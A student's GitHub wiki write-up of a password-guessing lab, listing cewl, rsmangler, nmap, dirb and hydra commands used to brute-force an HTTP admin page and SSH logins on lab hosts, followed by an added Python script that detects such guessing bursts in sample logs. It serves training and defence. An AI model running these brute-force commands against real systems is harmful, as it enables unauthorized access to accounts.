Lab 5.1 Password Guessing - zacharylongo/Tech-Journals GitHub Wiki
Lab 5.1: Password Guessing
Notes
The first step was to run nslookup against my target:
`nslookup 10.0.5.21 10.0.5.22`
Then I used cewl to crawl each biography and generate a wordlist:
`sudo cewl -d 1 http://10.0.5.21/bios/{Insert member here} | grep '^[A-Z]' >> {Insert member here}_long.txt`
After this I used rsmangler to mangle the short wordlist:
`rsmangler --file {Insert member here}_short.txt -x 12 -m 9 -l -s -e -i -p -u -a --output {MEMBER}_mangled.txt`
As a note:
- `-x` = maximum word length
- `-m` = minimum word length
- `-l` = lowercase word
- `-s` = uppercase word
- `-e` = add "ed" to the end of the word
- `-i` = add "ing" to the end of the word
- `-p` = permutate all of the words
- `-u` = uppercase word
- `-a` = create an acronym from all the entered words, in order, and add that word to the list
- `--file` = input file
- `--output` = file to write the output to
I then used nmap to scan the top 100 ports and identify their respective services/versions:
`sudo nmap -top-ports 100 10.0.6.21`
I'd then use dirb to find hidden pages:
`sudo dirb http://10.0.5.21/ -r`
Noting the locked admin page on the site, I'd then use my mangled password list to brute-force a match:
`sudo hydra -l {Insert member here} -P {Insert member here}_mangled.txt -s 80 -f 10.0.5.21 http-get "/admin"`
After this succeeded, I noted that SSH was open.
To find the associated passwords I used the following hydra command:
`sudo hydra -l {Insert User first name here}.{Insert User last name here} -P {Insert member here}_mangled.txt 10.0.5.21 -t 4 ssh`
This should get you the required results.
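From the target's side, the two hydra steps above (the `http-get` run against `/admin` and the `-t 4 ssh` run) show up as a burst of failed logins from one source followed, if a guess lands, by a success. The script below is an added example written for this write-up, not part of the original lab or any of the tools it uses: it parses constructed OpenSSH `auth.log` and Apache combined-log lines, flags any (source, account) or (source, path) pair that accumulates 5 failures inside 60 seconds, and marks whether a success followed the burst, which is the case that calls for an immediate credential reset rather than just a block. The addresses `10.0.0.99` and `10.0.0.7`, the accounts `john.smith` and `alice`, the year `2024` and the thresholds are all placeholders chosen for the sample.

```python
"""Flag password-guessing bursts in SSH and web-server logs (constructed samples)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in OpenSSH auth.log and Apache combined-log formats.
# 10.0.0.99 is a placeholder for the guessing host; john.smith and alice are
# placeholder accounts. Nothing here was captured from the lab hosts.
SSH_LOG = """\
Mar  3 10:15:01 web sshd[2101]: Failed password for john.smith from 10.0.0.99 port 50112 ssh2
Mar  3 10:15:01 web sshd[2102]: Failed password for john.smith from 10.0.0.99 port 50113 ssh2
Mar  3 10:15:02 web sshd[2103]: Failed password for john.smith from 10.0.0.99 port 50114 ssh2
Mar  3 10:15:02 web sshd[2104]: Failed password for john.smith from 10.0.0.99 port 50115 ssh2
Mar  3 10:15:03 web sshd[2105]: Failed password for john.smith from 10.0.0.99 port 50116 ssh2
Mar  3 10:15:04 web sshd[2106]: Accepted password for john.smith from 10.0.0.99 port 50117 ssh2
Mar  3 10:20:00 web sshd[2150]: Failed password for alice from 10.0.0.7 port 41000 ssh2
Mar  3 10:40:00 web sshd[2160]: Accepted password for alice from 10.0.0.7 port 41001 ssh2
"""
WEB_LOG = """\
10.0.0.99 - - [03/Mar/2024:10:12:00 +0000] "GET /admin HTTP/1.1" 401 381 "-" "-"
10.0.0.99 - - [03/Mar/2024:10:12:00 +0000] "GET /admin HTTP/1.1" 401 381 "-" "-"
10.0.0.99 - - [03/Mar/2024:10:12:01 +0000] "GET /admin HTTP/1.1" 401 381 "-" "-"
10.0.0.99 - - [03/Mar/2024:10:12:01 +0000] "GET /admin HTTP/1.1" 401 381 "-" "-"
10.0.0.99 - - [03/Mar/2024:10:12:02 +0000] "GET /admin HTTP/1.1" 401 381 "-" "-"
10.0.0.99 - - [03/Mar/2024:10:12:03 +0000] "GET /admin HTTP/1.1" 200 1523 "-" "-"
10.0.0.7 - - [03/Mar/2024:10:30:00 +0000] "GET /admin HTTP/1.1" 401 381 "-" "-"
10.0.0.7 - - [03/Mar/2024:10:31:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "-"
"""

SSH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port"
)
WEB_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
ASSUMED_YEAR = 2024              # syslog timestamps carry no year; assumed for the sample
WINDOW = timedelta(seconds=60)   # burst window (placeholder tuning value)
THRESHOLD = 5                    # failures per key inside WINDOW that count as a burst


def find_bursts(failures, successes, window=WINDOW, threshold=THRESHOLD):
    """failures/successes are lists of (datetime, key). A key is flagged when
    `threshold` failures fall inside `window`; a success on the same key at or
    after the moment the threshold was crossed means a guess landed."""
    by_key = defaultdict(list)
    for when, key in failures:
        by_key[key].append(when)
    findings = []
    for key, times in sorted(by_key.items()):
        times.sort()
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                crossed = times[i + threshold - 1]
                landed = any(k == key and t >= crossed for t, k in successes)
                findings.append({"source": key[0], "target": key[1],
                                 "failures": len(times), "followed_by_success": landed})
                break  # one finding per key is enough
    return findings


def analyze_ssh(text):
    """Key = (source IP, account). Returns burst findings for OpenSSH auth.log text."""
    failures, successes = [], []
    for line in text.splitlines():
        m = SSH_RE.match(line)
        if not m:
            continue
        stamp = " ".join(m["ts"].split())  # collapse the padded day ("Mar  3")
        when = datetime.strptime(f"{ASSUMED_YEAR} {stamp}", "%Y %b %d %H:%M:%S")
        key = (m["src"], m["user"])
        (failures if m["result"] == "Failed" else successes).append((when, key))
    return find_bursts(failures, successes)


def analyze_web(text):
    """Key = (source IP, path). 401 responses are failures; a 2xx on the same
    path after a burst means a credential was accepted."""
    failures, successes = [], []
    for line in text.splitlines():
        m = WEB_RE.match(line)
        if not m:
            continue
        when = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        key = (m["src"], m["path"])
        status = int(m["status"])
        if status == 401:
            failures.append((when, key))
        elif 200 <= status < 300:
            successes.append((when, key))
    return find_bursts(failures, successes)


if __name__ == "__main__":
    for name, findings in (("ssh", analyze_ssh(SSH_LOG)), ("web", analyze_web(WEB_LOG))):
        for finding in findings:
            print(name, finding)
```

Running it on the samples flags `10.0.0.99` against `john.smith` over SSH and against `/admin` over HTTP, both with `followed_by_success` set, while the single failure from `10.0.0.7` stays below the threshold. The same keying (source plus target) is what a lockout or fail2ban-style jail would act on; the "success after burst" flag is the one worth paging on, because at that point a block alone no longer contains the problem.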